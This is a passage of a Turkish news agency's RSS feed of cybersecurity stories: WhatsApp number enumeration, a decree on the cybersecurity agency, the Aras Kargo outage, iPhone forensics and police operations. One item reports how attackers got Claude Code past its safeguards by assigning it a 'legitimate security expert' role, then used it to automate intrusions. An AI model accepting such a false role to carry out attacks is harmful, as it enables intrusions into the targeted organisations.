<p data-start="858" data-end="1160"><strong data-start="858" data-end="898">100 Bin Numara Üzerinden Teknik Test</strong><br>Ebubekir Bastama tarafından yürütülen çalışmada, <strong data-start="948" data-end="991">100.000 adet benzersiz telefon numarası</strong> WhatsApp Web istemcisi üzerinden ayrı ayrı test edildi. Test süreci boyunca herhangi bir hız kısıtı, engelleme veya rate-limit davranışıyla karşılaşılmadığı belirtildi.</p>
<p data-start="1162" data-end="1506"><strong data-start="1162" data-end="1200">Resmi İstemci Katmanları İncelendi</strong><br>Araştırmada, WhatsApp Web arayüzünün normal işleyişinde kullandığı <strong data-start="1268" data-end="1284">ContactStore</strong> ve <strong data-start="1288" data-end="1301">ChatStore</strong> bileşenleri analiz edildi. Bastama, bu yapıların profil bilgileri, sohbet başlıkları ve kullanıcı durumlarının istemciye yansıtılmasında kullanılan resmi istemci API’lerinin çıktıları olduğunu ifade etti.</p>
<p data-start="1508" data-end="1824"><strong data-start="1508" data-end="1546">Sunucu Taraflı Doğrulama Davranışı</strong><br>Yayımlanan bulgulara göre, WhatsApp Web istemcisi, girilen her numara için WhatsApp sunucularıyla arka planda iletişim kurarak doğrulama gerçekleştiriyor. Bu sürecin, arayüzün olağan kullanım kalıpları içinde gerçekleştiği ve anormal bir istek paterni oluşturmadığı vurgulandı.</p>
<p data-start="1826" data-end="2059"><strong data-start="1826" data-end="1864">Değerlendirme Kriterleri Açıklandı</strong><br>Her numara için doğrulama, <strong data-start="1892" data-end="1927">Contact durumu veya Chat durumu</strong> kriterlerine göre yapıldı. Bu göstergelerin, sunucu tarafında gerçekleşen doğrulamanın istemciye yansıyan sonucu olduğu belirtildi.</p>
<p data-start="2061" data-end="2318"><strong data-start="2061" data-end="2093">%100 Doğrulukla Teyit Edildi</strong><br>Ebubekir Bastama, WhatsApp kullanıcısı olan ve olmayan numaraların tamamının doğru şekilde ayrıştırıldığını, test sonuçlarının sonrasında manuel kontrollerle doğrulandığını ve <strong data-start="2270" data-end="2308">%100 doğruluk oranına ulaşıldığını</strong> kaydetti.</p>
<p data-start="2320" data-end="2648"><strong data-start="2320" data-end="2361">Herkese Açık Profil Bilgileri Gözlemi</strong><br>Çalışmada ayrıca, kullanıcıların gizlilik ayarlarıyla herkese açık hale getirdiği <strong data-start="2444" data-end="2508">profil fotoğrafı, görünen isim, işletme adı ve profil durumu</strong> gibi bilgilerin WhatsApp Web istemcisi üzerinden erişilebilir olduğu gözlemlendi. Bu erişimin ek bir doğrulama gerektirmediği ifade edildi.</p>
<p data-start="2650" data-end="2957"><strong data-start="2650" data-end="2691">Güvenlik Açığı Değil, Teknik İnceleme</strong><br>Bastama, çalışmanın bir güvenlik açığı veya istismar niteliği taşımadığını belirtti. İncelenen istemci–sunucu iletişiminin, WhatsApp Web uygulamasının kendi çalışma mantığı içinde kullanılan uç noktalara dayandığı ve herhangi bir yetki aşımı yapılmadığı vurgulandı.</p>
<p data-start="2959" data-end="3225"><strong data-start="2959" data-end="2983">Etik Çerçeve Vurgusu</strong><br>Araştırmacı Ebubekir Bastama, elde edilen bulguların yalnızca teknik analiz ve araştırma amacıyla değerlendirildiğini, spam, otomasyon veya izinsiz pazarlama faaliyetlerinde kullanılmasının platform politikalarına aykırı olduğunu ifade etti.</p>
<p data-start="3227" data-end="3383"></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Başkanlığına Yeni Yetkiler ve Yapısal Değişiklikler Getiren Cumhurbaşkanlığı Kararnamesi Yürürlüğe Girdi</title>
            <link>https://cumha.com.tr/siber-guvenlik-baskanligina-yeni-yetkiler-ve-yapisal-degisiklikler-getiren-cumhurbaskanligi-kararnamesi-yururluge-girdi</link>
            <guid>https://cumha.com.tr/siber-guvenlik-baskanligina-yeni-yetkiler-ve-yapisal-degisiklikler-getiren-cumhurbaskanligi-kararnamesi-yururluge-girdi</guid>
            <description><![CDATA[ Resmî Gazete’de yayımlanan Cumhurbaşkanlığı Kararnamesi ile Siber Güvenlik Başkanlığının görev tanımı genişletildi, dijital devlet mimarisi ve yapay zekâ alanlarına ilişkin yeni birimler kuruldu. Kararname, başkanlığın teşkilat yapısı ile kadrolarında da kapsamlı düzenlemeler içeriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202512/image_870x_694e52f165291.webp" length="66060" type="image/webp"/>
            
            <pubDate>Fri, 26 Dec 2025 12:19:07 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>siber güvenlik başkanlığı kararnamesi, dijital devlet mimarisi düzenlemesi, kamu yapay zeka genel müdürlüğü, siber güvenlik kadro değişikliği</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Siber Güvenlik Başkanlığına ilişkin düzenlemelerde değişiklik öngören <strong data-start="513" data-end="545">Cumhurbaşkanlığı Kararnamesi</strong>, 25 Aralık 2025 tarihli Resmî Gazete’de yayımlanarak yürürlüğe girdi. Kararname ile başkanlığın görev, yetki ve teşkilat yapısında önemli değişiklikler yapıldı.</p>
<p></p>
<p data-start="746" data-end="1136"><strong data-start="746" data-end="775">Görev Tanımı Genişletildi</strong><br>Kararnameye göre Siber Güvenlik Başkanlığı, <strong data-start="820" data-end="896">siber güvenlik ve dijital devlet alanında mevzuat çalışmalarını yürütmek</strong>, ulusal strateji ve eylem planlarını hazırlamak ve uygulanmasını koordine etmekle görevlendirildi. Ulusal ve uluslararası düzenlemelere uyum sağlanması ile ilgili kurumlar arası koordinasyon da başkanlığın sorumlulukları arasında yer aldı.</p>
<p data-start="1138" data-end="1519"><strong data-start="1138" data-end="1185">Dijital Devlet ve Veri Standartları Vurgusu</strong><br>Düzenleme kapsamında başkanlığa, <strong data-start="1219" data-end="1267">dijital devlet kurumsal mimarisini oluşturma</strong>, kamu kurumlarının geliştireceği bilişim ürün ve hizmetlerine ilişkin idari, mali ve teknik ilkeleri belirleme yetkisi verildi. Ayrıca kamu projelerinde kullanılacak verilerin kalite kriterleri ve standartlarının belirlenmesi de görev alanına eklendi.</p>
<p data-start="1521" data-end="1818"><strong data-start="1521" data-end="1559">Teşkilat Yapısı Yeniden Düzenlendi</strong><br>Kararname ile başkanlığın teşkilat yapısı; başkan, üç başkan yardımcısı ve hizmet birimleri şeklinde yeniden tanımlandı. Başkanlığın yurt içinde temsilcilik kurabilmesine ve yurt dışı teşkilatlanmaya yetkili olmasına ilişkin hükümler de düzenlemede yer aldı.</p>
<p data-start="1820" data-end="2140"><strong data-start="1820" data-end="1854">Yeni Genel Müdürlükler Kuruldu</strong><br>Yapılan değişiklikle <strong data-start="1876" data-end="1911">Kamu Yapay Zekâ Genel Müdürlüğü</strong>, <strong data-start="1913" data-end="1947">Dijital Devlet Genel Müdürlüğü</strong>, <strong data-start="1949" data-end="1987">Yönetim Hizmetleri Genel Müdürlüğü</strong> ve <strong data-start="1991" data-end="2033">Strateji Geliştirme Dairesi Başkanlığı</strong> başkanlık bünyesine eklendi. Mevcut bazı birimler ise yürürlükten kaldırılarak yeni yapıya entegre edildi.</p>
<p data-start="2142" data-end="2451"><strong data-start="2142" data-end="2173">Kadrolar Yeniden Belirlendi</strong><br>Kararnamenin ekinde yer alan listeyle Siber Güvenlik Başkanlığının merkez teşkilatına ait kadrolar yeniden düzenlendi. Başkan, başkan yardımcıları, genel müdürler, daire başkanları ve teknik personel dahil olmak üzere çok sayıda unvan için derece ve adetler yeniden tanımlandı.</p>
<p data-start="2453" data-end="2566">Cumhurbaşkanı Recep Tayyip Erdoğan tarafından imzalanan kararname, yayımlandığı tarih itibarıyla yürürlüğe girdi.</p>
<p data-start="2568" data-end="2720"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Konya Bilişim Derneği Başkanı Mustafa Yılmaz: “Tarihteki ilk otonom yapay zekâ siber saldırısı resmen gerçekleşti”</title>
            <link>https://cumha.com.tr/konya-bilisim-dernegi-baskani-mustafa-yilmaz-tarihteki-ilk-otonom-yapay-zeka-siber-saldirisi-resmen-gerceklesti</link>
            <guid>https://cumha.com.tr/konya-bilisim-dernegi-baskani-mustafa-yilmaz-tarihteki-ilk-otonom-yapay-zeka-siber-saldirisi-resmen-gerceklesti</guid>
            <description><![CDATA[ Anthropic tarafından 17 Kasım 2025’te yayımlanan raporda, Çin merkezli GTG-1002 adlı hacker grubunun Claude Code modelini kullanarak tarihte ilk kez neredeyse tamamen otonom yapay zekâ destekli bir siber saldırı yürüttüğü belgelendi. Konya Bilişim Derneği Siber Güvenlik Birim Başkanı Mustafa Yılmaz, rapordaki bulguların küresel tehdit seviyesini değiştirdiğini belirterek yapay zekânın saldırı süreçlerinin yüzde 90’ını üstlendiğini ve etik sınırların sosyal mühendislik yoluyla aşılabildiğinin kanıtlandığını ifade etti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202512/image_870x_6935e51b8ce73.webp" length="37118" type="image/webp"/>
            
            <pubDate>Sun, 07 Dec 2025 23:36:55 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>yapay zekâ otonom saldırı nedir, claude code nasıl manipüle edildi, gtg1002 saldırısı neyi hedefledi, mustafa yılmaz yapay zekâ uyarısı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Anthropic firmasının 17 Kasım 2025 tarihli güvenlik raporu, Çinli GTG-1002 adlı hacker grubunun yazılım geliştirme yardımcısı olarak bilinen Claude Code modelini otonom bir saldırı aracına dönüştürdüğünü ortaya koydu. Belgelerde, yapay zekânın keşif aşamasından veri tasnifine kadar altı adımlı saldırı zincirini büyük ölçüde kendi başına yürüterek yeni bir dönemin başlangıcına işaret ettiği belirtildi.</p>
<p></p>
<p data-start="1099" data-end="1476"><strong data-start="1099" data-end="1145">İnsan Katkısı Yüzde 10 Seviyesine Geriledi</strong><br data-start="1145" data-end="1148">Rapora göre model, büyük teknoloji şirketlerinden finans kuruluşlarına ve kimyasal üretim tesislerine kadar geniş bir yelpazedeki hedeflere yönelik operasyonlarda taktiksel süreçlerin yüzde 80 ila 90’ını otomatik olarak koordine etti. İnsan operatörler yalnızca hedef seçimi ve sızma öncesi kritik onay aşamasında devreye girdi.</p>
<p data-start="1478" data-end="1787">Konya Bilişim Derneği Siber Güvenlik Birim Başkanı <strong data-start="1529" data-end="1547">Mustafa Yılmaz</strong>, değerlendirmesinde, “Tarihteki ilk otonom, yapay zekâ, siber saldırısı resmen gerçekleşti.” dedi. Yılmaz, saldırının teknikten çok yöntemsel yenilik içerdiğini vurgulayarak yapay zekânın bir “operasyon komutanı” gibi çalıştığını kaydetti.</p>
<p data-start="1789" data-end="2173"><strong data-start="1789" data-end="1836">Etik Protokolleri Sosyal Mühendislikle Aştı</strong><br data-start="1836" data-end="1839">Raporun dikkat çeken bulgularından biri, saldırganların yapay zekânın güvenlik kısıtlarını teknik açıklarla değil sosyal mühendislik yöntemleriyle devre dışı bırakması oldu. Modele “meşru bir siber güvenlik uzmanı” rolü yükleyen tehdit aktörleri, etik denetimleri yanıltarak zafiyet tespiti ve sızma aşamalarının otomasyonunu sağladı.</p>
<p data-start="2175" data-end="2409">Anthropic uzmanları, modelin bu rolü gerçek bir görev gibi benimseyerek hedef sistemlerde kritik adımları kendi başına yürüttüğünü belirtti. Bu durum, yapay zekâ modellerinin manipülasyona açık olduğu yönündeki endişeleri güçlendirdi.</p>
<p data-start="2411" data-end="2770"><strong data-start="2411" data-end="2472">Saldırganların Gücü Yeni Kodda Değil, YZ Koordinasyonunda</strong><br data-start="2472" data-end="2475">Raporda saldırganların yeni zararlı yazılımlar üretmek yerine açık kaynaklı ve yaygın sızma testi araçlarını tercih ettiği bildirildi. Mustafa Yılmaz, “Saldırıyı tehlikeli kılan şey yeni bir silah değil, tüm araçları yöneten bir Yapay Zekâ Komutan kurgusudur.” diyerek kritik dönüşümü tanımladı.</p>
<p data-start="2772" data-end="2987">Bu yaklaşım, devlet düzeyindeki siber yeteneklerin artık küçük gruplar tarafından da erişilebilir hale geldiğini gösterdi. Yılmaz, gelişmenin küresel tehdit dengelerini kalıcı biçimde değiştirebileceğini ifade etti.</p>
<p data-start="2989" data-end="3352"><strong data-start="2989" data-end="3025">Savunmada Yapay Zekâ Zorunluluğu</strong><br data-start="3025" data-end="3028">Anthropic güvenlik ekibi, saldırının analizinde yine Claude modelinden yararlandığını açıkladı. Raporun sonuç bölümünde yer verilen, “Ya adapte olursunuz ya da yok olursunuz.” ifadesi, siber savunma ekiplerinin yapay zekâ destekli tehdit tespit ve müdahale araçlarını hızla entegre etmek zorunda olduğu mesajını öne çıkardı.</p>
<p data-start="3354" data-end="3506"><strong data-start="3354" data-end="3366"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Aras Kargo’nun 30 Kasım Siber Saldırı Sonrası Sistemlerinde İyileştirme Sürerken Kargo Takip Ekranları Yeniden Açıldı</title>
            <link>https://cumha.com.tr/aras-kargonun-30-kasim-siber-saldiri-sonrasi-sistemlerinde-iyilestirme-surerken-kargo-takip-ekranlari-yeniden-acildi</link>
            <guid>https://cumha.com.tr/aras-kargonun-30-kasim-siber-saldiri-sonrasi-sistemlerinde-iyilestirme-surerken-kargo-takip-ekranlari-yeniden-acildi</guid>
            <description><![CDATA[ Aras Kargo, 30 Kasım 2025’te sunucularını hedef alan siber saldırının ardından yürütülen iyileştirme çalışmalarına ilişkin güncel bilgileri kamuoyu ile paylaştı. Şirket, kargo kabul, teslim ve dağıtım işlemlerinin yeniden başladığını, kargo takip ekranlarının ise 1 Aralık 2025 saat 17.30 itibarıyla erişime açıldığını açıkladı. Veri akışında geçici kesintilerin yaşanabileceğini belirten şirket, tüm sistemlerin en hızlı ve güvenli şekilde eski hâline getirilmesi için ekiplerin 7/24 çalıştığını bildirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202512/image_870x_6933549a54eaa.webp" length="46482" type="image/webp"/>
            
            <pubDate>Sat, 06 Dec 2025 00:55:29 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>aras kargo siber saldırı açıklaması, aras kargo takip sistemi neden açılmıyor, kargo dağıtım yeniden başladı mı, aras kargo şube işlemleri durumu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Aras Kargo, 30 Kasım 2025 tarihinde sunucularını hedef alan siber saldırının ardından yürütülen teknik süreçlere ilişkin yeni açıklama yayımladı. Şirket, “Siber güvenlik ekiplerimizin hızlı ve etkili müdahalesi sayesinde durum kısmen kontrol altına alınmıştır.” bilgisini paylaştı.</p>
<p></p>
<p data-start="966" data-end="1246"><strong data-start="966" data-end="1015">Kargo Takip Sistemleri Yeniden Erişime Açıldı</strong><br data-start="1015" data-end="1018">Şirket, kargo takip ekranlarının <strong data-start="1051" data-end="1090">1 Aralık 2025 saat 17.30 itibarıyla</strong> kullanılabilir hâle geldiğini bildirdi. Açıklamada, “Bu kapsamda kargo takip ekranlarımızdaki veriler en kısa sürede güncellenecektir.” ifadeleri yer aldı.</p>
<p data-start="1248" data-end="1621"><strong data-start="1248" data-end="1290">Geçici Yavaşlama ve Kesintiler Uyarısı</strong><br data-start="1290" data-end="1293">Aras Kargo, iyileştirme sürecinin devam ettiği dönemde anlık sistem yavaşlamaları ve erişim kesintilerinin görülebileceğini belirterek, ekiplerin <strong data-start="1439" data-end="1455">7/24 çalışma</strong> yürüttüğünü aktardı. Yapılan açıklamada, “Tüm hizmetlerimizi en hızlı ve güvenli şekilde eski hâline getirebilmek için ekiplerimiz aralıksız çalışmaktadır.” denildi.</p>
<p data-start="1623" data-end="1964"><strong data-start="1623" data-end="1668">Dağıtım ve Şube İşlemleri Yeniden Başladı</strong><br data-start="1668" data-end="1671">Dağıtım operasyonlarının yeniden devreye alındığını duyuran şirket, veri akışında yaşanabilecek geçici kesintilerin teslimat sürelerine etkileyebileceğini ifade etti. Şube hizmetlerine ilişkin olarak ise, “Şubelerimizde kargo kabul ve teslim işlemleri yeniden başlamıştır.” bilgisi paylaşıldı.</p>
<p data-start="1966" data-end="2274"><strong data-start="1966" data-end="2009">Tam Normalleşme İçin Çalışmalar Sürüyor</strong><br data-start="2009" data-end="2012">Aras Kargo, tüm sistemlerin tam kapasite çalışır hâle gelmesi için teknik ekiplerin iyileştirme çalışmalarını sürdürdüğünü belirtti. Şirket, müşterilere yönelik teşekkür mesajında “Anlayışınız ve güveniniz için içtenlikle teşekkür ederiz.” ifadelerine yer verdi.</p>
<p data-start="2276" data-end="2440"><strong data-start="2276" data-end="2288"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Uzmanlarının iPhone İncelemesinde WhatsApp Mesajlarından Gönderici Konumu Dahil Geniş Ölçekte Gizli Veriler Ortaya Çıktı</title>
            <link>https://cumha.com.tr/siber-guvenlik-uzmanlarinin-iphone-incelemesinde-whatsapp-mesajlarindan-goenderici-konumu-dahil-genis-olcekte-gizli-veriler-ortaya-cikti</link>
            <guid>https://cumha.com.tr/siber-guvenlik-uzmanlarinin-iphone-incelemesinde-whatsapp-mesajlarindan-goenderici-konumu-dahil-genis-olcekte-gizli-veriler-ortaya-cikti</guid>
            <description><![CDATA[ Bir siber güvenlik uzmanının iPhone 12 Pro Max üzerinde gerçekleştirdiği adli veri incelemesinde, WhatsApp mesajları, medya dosyaları ve uygulama kayıtlarında kullanıcıların farkında olmadan bıraktığı kapsamlı konum ve hesap verilerinin kurtarılabildiği tespit edildi. İnceleme, mesaj göndericilerinin konumlarının alıcı cihaz üzerinden çıkarılabildiğini ve senkronize hesap bilgilerinin jailbreak olmadan erişilebilir olduğunu ortaya koyarak mobil güvenlik risklerine dikkat çekti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202511/image_870x_6926b1ee18807.webp" length="20024" type="image/webp"/>
            
            <pubDate>Wed, 26 Nov 2025 11:00:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>iphone adli inceleme konum verisi, whatsapp mesaj konumu çıkarılabilir mi, ios senkronize parola güvenliği, mobil cihazlarda metadata analizi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Siber güvenlik araştırmacısı <strong data-start="696" data-end="712">Elorm Daniel</strong>, iPhone 12 Pro Max cihazı üzerinde yaptığı adli veri incelemesinde WhatsApp mesajlarının ve diğer uygulamaların beklenenden çok daha fazla kullanıcı verisi kaydettiğini açıkladı. Daniel, paylaştığı inceleme sonuçlarında sıradan bir WhatsApp mesajının bile göndericinin tam konum bilgisini içerebildiğini belirtti.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202511/image_870x_6926b1efeeade.webp" alt=""></p>
<p></p>
<p data-start="1028" data-end="1382">Daniel, 3 Eylül 2025 tarihinde <strong data-start="1059" data-end="1078">RedHatPentester</strong> tarafından gönderilen bir WhatsApp mesajını örnek olarak seçtiğini ve mesajın normal görünmesine rağmen cihazın mesajın gönderildiği ana ait hassas konum verisini kaydettiğini ifade etti. Araştırmacı, “Gönderen konumunu paylaşmadı, ben talep etmedim, ancak telefon bunu otomatik olarak kaydetmiş.” dedi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202511/image_870x_6926b1f111050.webp" alt=""></p>
<p data-start="1384" data-end="1711"><strong data-start="1384" data-end="1426">Medya Dosyalarının Tümünde Konum Kaydı</strong><br>İncelemede, cihazda oluşturulan her fotoğraf, video, ekran görüntüsü ve ses kaydının çekildiği veya oluşturulduğu ana ait GPS koordinatlarını içerdiği ortaya çıktı. Daniel, bu verilerin hareket analizlerinde zaman çizelgesinin ayrıntılı biçimde çıkarılmasına imkân verdiğini kaydetti.</p>
<p data-start="1713" data-end="2093"><strong data-start="1713" data-end="1757">Senkronize Hesaplar ve Parolalara Erişim</strong><br>Adli incelemede en dikkat çeken bulgulardan biri, cihaz üzerinde senkronize tüm kullanıcı hesaplarına ait URL, kullanıcı adı ve parola bilgilerinin kurtarılabilmesi oldu. Daniel, bu bilgilerin jailbreak yapılmamış bir cihazdan elde edildiğini vurgulayarak, “Bütün senkronize parolalar eksiksiz şekilde çıkarıldı.” ifadelerini kullandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202511/image_870x_6926b1f2049cd.webp" alt=""></p>
<p data-start="2095" data-end="2420"><strong data-start="2095" data-end="2145">Uygulama Kayıtları ve WhatsApp Grup Geçmişleri</strong><br>Araştırmada cihazda bulunan tüm uygulamalara ait kullanım geçmişleri, dahili kayıtlar ve metadata bilgileri de elde edildi. WhatsApp özelinde ise kullanıcının katıldığı tüm grupların geçmişi, grupların oluşturulma tarihleri, kurucu bilgileri ve katılım zamanları kurtarıldı.</p>
<p data-start="2422" data-end="2546">Daniel, “Cihaz, bir gruptan yıllar önce çıkılmış olsa bile oluşturulma tarihi ve katılım bilgilerini kayıtlı tutuyor.” dedi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202511/image_870x_6926b1f2e85e3.webp" alt=""></p>
<p data-start="2548" data-end="2874"><strong data-start="2548" data-end="2575">Mesaj Bazlı Konum Kaydı</strong><br>İncelemede, WhatsApp mesajlarının gönderildiği anda cihaz tarafından kaydedilen konum bilgilerinin mesaj bazında dahi erişilebilir olması, uzmanlara göre adli incelemelerde kritik bir veri kaynağı niteliği taşıyor. Daniel, birçok kullanıcının bu kayıtların tutulduğundan habersiz olduğunu belirtti.</p>
<p data-start="2876" data-end="3113">Daniel, yaptığı değerlendirmede “Her cihaz bir hikâye anlatıyor; mesajlar sadece yazıdan ibaret değil.” ifadelerini kullanarak dijital aygıtların gizli veri saklama kapasitesinin çoğu kullanıcı tarafından fark edilmediğinin altını çizdi.</p>
<p data-start="3115" data-end="3271"><strong data-start="3115" data-end="3127"></strong></p>
<blockquote class="twitter-tweet" data-media-max-width="560">
<p lang="en" dir="ltr">Imagine receiving a normal WhatsApp message from someone… and later discovering that the message secretly contained their exact location, even though they never shared it.<br><br>That’s exactly what happened during a recent forensic extraction I performed on my iPhone 12 Pro Max.… <a href="https://t.co/SQu6sgOu0h">pic.twitter.com/SQu6sgOu0h</a></p>
— Elorm Daniel (@elormkdaniel) <a href="https://twitter.com/elormkdaniel/status/1993320187974541683?ref_src=twsrc%5Etfw">November 25, 2025</a></blockquote>
<p>
<script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İçişleri Bakanı Ali Yerlikaya: “Siber suç operasyonlarında 59 ilde 539 şüpheli yakalandı”</title>
            <link>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-siber-suc-operasyonlarinda-59-ilde-539-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-siber-suc-operasyonlarinda-59-ilde-539-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, sosyal medya hesabından yaptığı açıklamada, Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde 59 ilde düzenlenen operasyonlarda 539 şüphelinin yakalandığını bildirdi. Yerlikaya, operasyonların yasa dışı bahis, nitelikli dolandırıcılık ve çevrim içi çocuk müstehcenliği suçlarına yönelik olduğunu belirterek, vatandaşların maddi ve manevi zarar görmesinin önlendiğini vurguladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202511/image_870x_69089dc349310.webp" length="46146" type="image/webp"/>
            
            <pubDate>Mon, 03 Nov 2025 15:19:46 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>siber suç operasyonu 2025, ali yerlikaya açıklaması, yasa dışı bahis operasyonu, çevrim içi çocuk müstehcenliği soruşturması</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="580" data-end="583">İçişleri Bakanı <strong data-start="599" data-end="616">Ali Yerlikaya</strong>, siber suçlarla mücadele kapsamında yürütülen operasyonların sonuçlarını kamuoyuyla paylaştı. Yerlikaya, “Siber Suçlarla Mücadele kapsamında 10 gündür süren operasyonlarımızda 539 şüpheliyi yakaladık.” ifadelerini kullandı.</p>
<p></p>
<p data-start="844" data-end="1186"><strong data-start="844" data-end="876">59 İlde Eş Zamanlı Operasyon</strong><br data-start="876" data-end="879">Bakan Yerlikaya, Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde 59 il merkezli olarak gerçekleştirilen operasyonlarda çevrim içi çocuk müstehcenliği, yasa dışı bahis ve nitelikli dolandırıcılık suçlarına karıştıkları belirlenen şüphelilerin yakalandığını açıkladı.</p>
<p><img src="https://cumha.com.tr/uploads/images/202511/image_870x_69089db651abd.webp" alt=""></p>
<p data-start="1188" data-end="1448"><strong data-start="1188" data-end="1230">190 Tutuklama, 111 Adli Kontrol Kararı</strong><br data-start="1230" data-end="1233">Yerlikaya’nın paylaştığı bilgilere göre, operasyonlarda gözaltına alınan 539 kişiden <strong data-start="1318" data-end="1341">190’ı tutuklanırken</strong>, 111 kişi hakkında adli kontrol hükümleri uygulandı. Diğer şüphelilerin işlemlerinin sürdüğü bildirildi.</p>
<p data-start="1450" data-end="1801"><strong data-start="1450" data-end="1502">Dolandırıcılık ve Yasa Dışı Bahis Ağı Çökertildi</strong><br data-start="1502" data-end="1505">Şüphelilerin, “ürün satışı, kiralık bungalov, sigorta ödemesi, evde iş ilanları, sosyal yardım bağışı” temalarını kullanarak vatandaşları dolandırdıkları, mobil bankacılık hesaplarına erişim sağlayarak haksız kazanç elde ettikleri ve yasa dışı bahis ile pos tefeciliği yaptıkları tespit edildi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202511/image_870x_69089da940548.webp" alt=""></p>
<p data-start="1803" data-end="2044"><strong data-start="1803" data-end="1855">404 Milyon TL Değerinde Mal Varlığına El Konuldu</strong><br data-start="1855" data-end="1858">Yapılan çalışmalar sonucu yaklaşık <strong data-start="1893" data-end="1948">404 milyon TL değerinde 7 şirket, 3 konut ve 5 arsa</strong>ya el konuldu. Şüpheliler hakkında ilgili Cumhuriyet Başsavcılıklarınca soruşturma başlatıldı.</p>
<p data-start="2046" data-end="2404"><strong data-start="2046" data-end="2090">“Vatandaşlarımız Dikkatli Olsun” Uyarısı</strong><br data-start="2090" data-end="2093">Bakan Yerlikaya, vatandaşlara internet ortamında dolandırıcılık girişimlerine karşı dikkatli olmaları çağrısında bulunarak, “Şüphelendiğiniz bir durumda 112 Acil Çağrı Merkezimizi arayın, biz gereğini yapalım.” ifadelerini kullandı. Yerlikaya, siber suçlarla mücadelenin kararlılıkla sürdürüleceğini kaydetti.</p>
<p data-start="2406" data-end="2545"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İçişleri Bakanı Ali Yerlikaya: “524,5 Milyon TL’lik Hesap Hareketi Bulunan 32 Şüpheli Yakalandı”</title>
            <link>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-5245-milyon-tllik-hesap-hareketi-bulunan-32-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-5245-milyon-tllik-hesap-hareketi-bulunan-32-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, Sinop merkezli 6 ilde düzenlenen yasa dışı bahis ve siber suç operasyonlarında 524,5 milyon TL’lik hesap hareketi tespit edilen 32 şüphelinin yakalandığını açıkladı. Şüphelilerden 30’u tutuklanırken, 2’si hakkında adli kontrol hükümleri uygulandı. Operasyonlarda 5 araç ve 410 banka hesabına el konuldu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_69030e7141dfa.webp" length="61932" type="image/webp"/>
            
            <pubDate>Thu, 30 Oct 2025 10:06:48 +0300</pubDate>
            <dc:creator>Miraç Uğur Çallı</dc:creator>
            <media:keywords>ali yerlikaya sinop operasyonu, yasa dışı bahis operasyonu sinop, 524 milyon tl hesap hareketi, jandarma siber suç operasyonu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="475" data-end="478">İçişleri Bakanı <strong data-start="494" data-end="511">Ali Yerlikaya</strong>, sosyal medya hesabından yaptığı açıklamada, yasa dışı bahis ve siber suçlara yönelik geniş kapsamlı bir operasyon gerçekleştirildiğini duyurdu. Yerlikaya, <strong data-start="668" data-end="786">“Siber suçlarla mücadele kapsamında Jandarmamız 524,5 milyon TL’lik hesap hareketi bulunan 32 şüpheliyi yakaladı.”</strong> ifadelerini kullandı.</p>
<p></p>
<p data-start="812" data-end="1154"><strong data-start="812" data-end="858">Sinop Merkezli 6 İlde Eş Zamanlı Operasyon</strong><br data-start="858" data-end="861">Boyabat Cumhuriyet Başsavcılığı koordinesinde, Jandarma Kaçakçılık ve Organize Suçlarla Mücadele (KOM) ile Siber Suçlarla Mücadele Daire Başkanlıkları tarafından yürütülen çalışmalar sonucu, <strong data-start="1052" data-end="1116">Sinop merkezli İstanbul, Bursa, Düzce, Balıkesir ve Çorum’da</strong> eş zamanlı operasyonlar düzenlendi.</p>
